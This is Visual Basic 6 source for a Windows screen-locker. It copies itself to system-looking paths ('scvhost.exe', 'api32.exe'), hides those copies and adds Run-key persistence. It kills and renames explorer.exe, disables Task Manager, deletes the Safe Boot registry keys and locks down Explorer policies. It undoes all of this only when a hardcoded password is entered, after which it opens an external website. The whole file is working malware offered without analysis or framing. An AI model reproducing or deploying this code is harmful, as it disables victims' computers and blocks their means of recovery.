Public Function copy() As Long On Error Resume Next FileCopy App.Path & "\" & App.EXEName & ".exe", "C:\WINDOWS\scvhost.exe" DoEvents DoEvents DoEvents FileCopy App.Path & "\" & App.EXEName & ".exe", "C:\WINDOWS\System32\api32.exe" End Function Private Sub Form_Load() On Error Resume Next copy Shell "cmd /c reg export HKLM\SYSTEM\currentcontrolset\control\safeboot C:\Windows\backup.reg" Shell "cmd /c attrib +R +S +H C:\WINDOWS\scvhost.exe" Shell "cmd /c attrib -R -S -H C:\WINDOWS\explorer.exe" Shell "cmd /c attrib -R -S -H C:\WINDOWS\System32\explorer.exe" Shell "cmd /c tskill explorer" Shell "cmd /c taskkill /F /IM explorer.exe" Shell "cmd /c ren C:\WINDOWS\explorer.exe ex.bmp" Shell "cmd /c ren C:\WINDOWS\system32\explorer.exe ex.bmp" Shell "cmd /c attrib +R +S +H C:\WINDOWS\System32\api32.exe" Shell "cmd /c attrib +R +S +H C:\WINDOWS\backup.reg" Shell "cmd /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Winlogon /t REG_SZ /d C:\WINDOWS\System32\api32.exe /f" Shell "cmd /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Winlogon /t REG_SZ /d C:\WINDOWS\scvhost.exe /f" Shell "cmd /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d ""1"" /f" Shell "cmd /c reg delete ""HKLM\SYSTEM\currentcontrolset\control\safeboot\minimal"" /f" Shell "cmd /c reg delete ""HKLM\SYSTEM\CurrentControlSet\control\safeboot\network"" /f" Shell "cmd /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d ""1"" /f" Shell "cmd /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoChangeStartMenu /t REG_DWORD /d ""1"" /f" Shell "cmd /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d ""1"" /f" Shell "cmd /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_SZ /d ""1"" /f" Shell "cmd /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispSettingsPage /t REG_DWORD /d ""1"" /f" Shell "cmd /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDispCPL /t REG_DWORD /d ""1"" /f" Shell "cmd /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRecentDocsMenu /t REG_DWORD /d ""1"" /f" Shell "cmd /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d ""1"" /f" End Sub Private Sub Command1_Click() On Error Resume Next If Text1.Text = "Sph1nX" Then Shell "cmd /c attrib -R -S -H C:\WINDOWS\backup.reg" Shell "cmd /c attrib -R -S -H C:\WINDOWS\scvhost.exe" Shell "cmd /c attrib -R -S -H C:\Windows\scvhost.exe" Shell "cmd /c attrib -R -S -H C:\Windows\System32\api32.exe" Shell "cmd /c attrib -R -S -H C:\WINDOWS\System32\api32.exe" Shell "cmd /c reg import C:\Windows\backup.reg" Shell "cmd /c reg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Winlogon /f" Shell "cmd /c reg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run\svchost /f" Shell "cmd /c reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr /f" Shell "cmd /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d ""0"" /f" Shell "cmd /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d ""0"" /f" Shell "cmd /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoChangeStartMenu /t REG_DWORD /d ""0"" /f" Shell "cmd /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d ""0"" /f" Shell "cmd /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_SZ /d ""0"" /f" Shell "cmd /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispSettingsPage /t REG_DWORD /d ""0"" /f" Shell "cmd /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDispCPL /t REG_DWORD /d ""0"" /f" Shell "cmd /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRecentDocsMenu /t REG_DWORD /d ""0"" /f" Shell "cmd /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d ""0"" /f" Kill "C:\WINDOWS\scvhost.exe" Kill "C:\Windows\scvhost.exe" Kill "C:\Windows\System32\api32.exe" Kill "C:\WINDOWS\System32\api32.exe" Shell "cmd /c ren C:\WINDOWS\ex.bmp explorer.exe" Shell "cmd /c ren C:\WINDOWS\system32\ex.bmp explorer.exe" Shell "cmd /c attrib +R +S +H C:\WINDOWS\explorer.exe" Shell "cmd /c attrib +R +S +H C:\WINDOWS\System32\explorer.exe" Shell "C:\WINDOWS\explorer.exe" Shell "cmd /c start www.batch-rockz.dl.am" Unload Me Else: MsgBox "PW Falsch", vbOKOnly, "Falsch" End If End Sub